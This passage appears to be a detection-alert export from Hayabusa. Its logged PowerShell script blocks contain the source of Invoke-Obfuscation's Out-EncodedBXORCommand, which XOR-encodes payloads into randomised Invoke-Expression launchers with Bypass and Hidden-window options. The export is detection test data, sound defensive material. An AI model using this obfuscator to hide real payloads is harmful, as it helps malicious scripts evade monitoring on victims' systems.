-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. 
$HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input 
@(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. 
$Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfil -NonInter ""((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8 3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 ) | fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"" C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ( ( 180,145 , 138 ,151, 134, 206 ,171 , 140, 144 ,151 , 195 ,196 , 171 ,134, 143 ,143,140 , 195 ,180, 140 , 145 ,143,135 , 194,196 , 195, 206, 165,140 ,145,134,132,145,140 , 150 ,141, 135 , 160, 140 ,143 , 140 ,145 , 195,164,145 , 134 , 134 , 141 ,216 ,195 ,180 ,145 ,138, 151 ,134 ,206, 171,140 , 144 ,151,195 ,196,172,129 ,133 ,150,144 , 128 ,130 ,151 ,138,140 ,141 , 195 , 177,140,128,136 , 144 , 194, 196 ,195,206,165 , 140 , 145,134,132, 145 ,140 ,150 ,141,135 , 16 0 , 140, 143, 140 , 145 ,195 ,164 ,145,134 , 134, 141) | fOrEAch-ObJect {[chaR] ( $_-BXor 0xE3 ) } )-jOIN'' | iEx .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Generate random hex value for BXOR. Keep from 0x00 to 0x5F to avoid character representations on the command line that are unsupported by PowerShell. 
$HexDigitRange = @(0,1,2,3,4,5,6,7,8,9,'a','A','b','B','c','C','d','D','e','E','f','F') $BXORValue = '0x' + (Get-Random -Input @(0..5)) + (Get-Random -Input $HexDigitRange) # Convert $ScriptString to delimited and BXOR'd ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $BXOR = ([Char[]]'-BXOR' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input 
@(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. If($ScriptString.Contains('^')) { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += '(' + (Get-Random -Input @('-Replace','-CReplace')) + "" '^','' -$Split"" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1)) $Split = ([Char[]]""Replace('^','').Split"" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } Else { $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } # Randomize case of full syntax from above If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. 
$Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input 